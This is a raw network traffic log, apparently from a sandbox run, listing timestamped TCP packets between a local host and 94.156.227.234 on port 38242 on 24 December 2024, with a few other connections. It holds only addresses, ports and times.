Dec 24, 2024 05:43:20.777663946 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:20.777848005 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:20.777873993 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:20.897500038 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:21.281182051 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:21.446099043 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:21.906322002 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:21.906414032 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:22.281934023 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:22.401606083 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:22.401673079 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:22.401711941 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:22.521249056 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:22.905263901 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:23.066221952 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:23.524430037 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:23.526056051 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:23.906052113 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:24.025921106 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:24.026022911 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:24.026050091 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:24.177424908 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:24.237683058 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 05:43:24.529800892 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:24.690020084 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:25.149657011 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:25.149723053 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:25.532226086 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:25.651942968 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:25.652012110 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:25.652057886 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:25.773386002 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:26.155193090 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:26.541342974 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:26.574193001 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:26.661988020 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:26.818830967 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:26.818893909 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:27.156312943 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:27.275950909 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:27.276041031 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:27.276079893 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:27.395839930 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:27.779922962 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:27.942178965 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:28.333173037 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 05:43:28.399825096 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:28.399883986 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:28.780812025 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:28.901655912 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:28.901709080 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:28.901731968 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:29.021305084 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:29.404396057 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:29.565964937 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:30.024625063 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:30.024730921 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:30.405076027 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:30.524687052 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:30.527339935 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:30.527339935 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:30.646958113 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:31.030673027 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:31.194057941 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:31.674380064 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:31.674539089 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.031404018 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.151030064 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:32.151113033 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.151113987 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.620503902 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.632713079 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:32.654436111 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:32.740259886 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:32.818054914 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:33.635914087 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:33.636004925 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:33.655338049 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:33.774912119 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:33.774997950 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:33.775049925 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:33.894643068 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:34.280101061 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:34.445995092 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:34.896456957 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:34.896538973 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:35.281213999 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:35.401190042 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:35.401262999 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:35.401283026 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:35.521009922 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:35.904648066 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:36.065956116 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:36.519726992 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:36.519787073 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:36.905919075 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:37.025778055 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:37.025924921 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:37.026022911 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:37.145620108 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:37.532680035 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:37.694010019 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:38.144078970 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:38.144335985 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:38.533550024 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:38.653251886 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:38.653554916 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:38.653554916 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:38.773356915 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:39.158055067 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:39.318133116 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:39.438272953 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:39.438394070 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:39.780116081 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:39.780222893 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:40.159143925 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:40.278882980 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:40.279093027 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:40.279158115 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:40.398718119 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:40.783849955 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:40.950270891 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:41.394642115 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:41.394726992 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:41.785460949 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:41.905508041 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:41.905810118 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:41.905961037 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:42.025835991 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:42.413688898 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:42.574116945 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:43.026814938 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:43.027128935 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:43.414778948 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:43.534770012 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:43.534979105 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:43.534979105 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:43.654728889 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:44.039700031 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:44.204034090 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:44.652702093 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:44.653198004 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:45.040676117 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:45.160474062 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:45.160743952 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:45.160743952 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:45.280402899 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:45.664767981 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:45.830127954 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:46.286166906 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:46.286336899 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:46.666193962 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:46.786042929 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:46.786312103 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:46.786312103 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:46.906018972 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:47.290503979 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:47.457947969 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:47.917182922 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:47.917325020 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:48.292200089 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:48.412260056 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:48.412411928 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:48.412564993 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:48.532454967 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:48.920388937 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:49.086211920 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:49.545902967 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:49.546191931 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:49.921479940 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:50.089818954 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:50.089987993 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:50.090114117 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:50.210077047 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:50.595269918 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:50.757937908 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:51.227339983 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:51.227437019 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:51.596777916 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:51.716521025 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:51.716613054 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:51.716687918 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:51.836246014 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:52.222398043 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:52.386342049 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:52.863346100 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:52.863440037 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:52.905735016 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 05:43:53.223849058 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:53.344136000 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:53.344242096 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:53.344319105 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:53.464046955 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:53.849159002 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:54.014115095 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:54.468936920 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:54.469125986 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:54.850188971 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:54.969836950 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:54.969932079 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:54.969995022 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:55.089678049 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:55.474250078 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:55.638037920 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:56.092495918 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:56.092626095 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:56.476006985 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:56.595633984 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:56.595694065 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:56.595727921 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:56.715230942 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:57.100436926 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:57.262026072 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:57.710784912 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:57.710887909 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:58.101845980 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:58.221549988 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:58.221779108 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:58.221870899 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:58.341519117 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:58.729428053 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:58.894054890 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:59.346538067 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:59.346730947 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:59.730792999 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:59.850460052 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:43:59.850574970 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:59.850678921 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:43:59.970379114 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:00.356040001 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:00.521986961 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:00.997457027 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:00.997730017 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:01.357494116 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:01.478425026 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:01.478585958 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:01.478669882 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:01.598365068 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:01.985644102 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:02.146034002 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:02.605001926 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:02.605063915 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:02.987055063 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:03.106710911 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:03.106839895 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:03.106951952 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:03.226633072 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:03.612920046 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:03.773977041 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:04.227107048 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:04.227236986 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:04.614151955 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:04.733803034 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:04.734035015 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:04.734076977 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:04.853673935 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:05.239244938 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:05.401937008 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:05.852827072 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:05.853068113 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:06.240782022 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:06.360347986 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:06.360428095 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:06.360610962 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:06.480187893 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:06.866456985 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:07.029993057 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:07.487153053 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:07.487255096 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:07.867777109 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:07.987366915 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:07.987438917 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:07.987514973 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:08.107222080 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:08.492134094 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:08.657895088 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:09.119811058 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:09.120040894 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:09.493340015 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:09.613028049 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:09.613151073 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:09.613214970 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:09.732999086 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:10.118418932 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:10.285837889 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:10.742063999 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:10.742135048 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:11.119501114 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:11.239352942 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:11.239439011 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:11.239588022 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:11.359123945 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:11.744388103 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:11.905838013 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:12.367235899 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:12.367372990 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:12.745826006 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:12.865537882 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:12.865695953 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:12.865763903 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:12.985373974 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:13.371661901 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:13.533942938 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:13.989335060 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:13.989489079 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:14.373554945 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:14.493161917 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:14.493280888 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:14.493386030 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:14.613013983 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:14.999816895 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:15.162062883 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:15.621427059 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:15.621679068 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:16.001221895 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:16.121977091 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:16.122090101 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:16.122250080 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:16.241755009 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:16.628818035 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:16.794028044 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:17.237932920 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:17.238065958 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:17.631144047 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:17.751005888 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:17.751199961 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:17.751349926 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:17.870870113 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:18.257230043 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:18.417856932 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:18.887355089 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:18.887582064 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:19.258131027 CET	60116	38242	192.168.2.23	94.156.227.234
